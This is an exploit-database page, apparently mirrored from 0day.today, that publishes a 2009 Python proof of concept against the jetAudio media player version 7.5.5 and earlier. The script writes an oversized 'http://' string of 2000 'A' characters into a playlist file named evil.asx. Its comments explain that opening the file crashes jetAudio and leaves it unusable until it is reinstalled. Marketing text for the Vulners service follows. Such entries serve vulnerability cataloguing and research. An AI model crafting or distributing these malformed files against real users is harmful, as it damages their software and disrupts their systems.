Lucene search
K

jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC

🗓️ 10 Sep 2009 00:00:00Reported by Dr_IDEType 
zdt
 zdt
🔗 0day.today👁 38 Views

jetAudio 7.5.5 vx Local Crash Po

Code
===========================================================
jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC
===========================================================


#!/usr/bin/evn python

#####################################################################################
#
# jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC (DoS?)
# By:		Dr_IDE
# Download:	http://www.jetaudio.com/
# Notes:	This is an update from my earlier posting
#
#####################################################################################

#
# Behavior is different than in the 7.1.X stuff.
#
# On versions 7.5.3 and higher these files will actually creates a "DoS" for the program.
# It does not look like code execution is possible, instead the program becomes unusable. 
#
# After opening one of these files, whether it be .M3U as I reported earlier 
# or .ASX/.WAX/.WVX now, the program becomes trashed. Exception is thrown in MSVCR9.DLL. 
#
# The only fix is to uninstall the program and reinstall from the original source to 
# restore functionality.
#

buff = ("http://" + "\x41" * 2000);

f1 = open("evil.asx","w"); # M3U/ASX/WAX/WVX
f1.write(buff);
f1.close()



#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation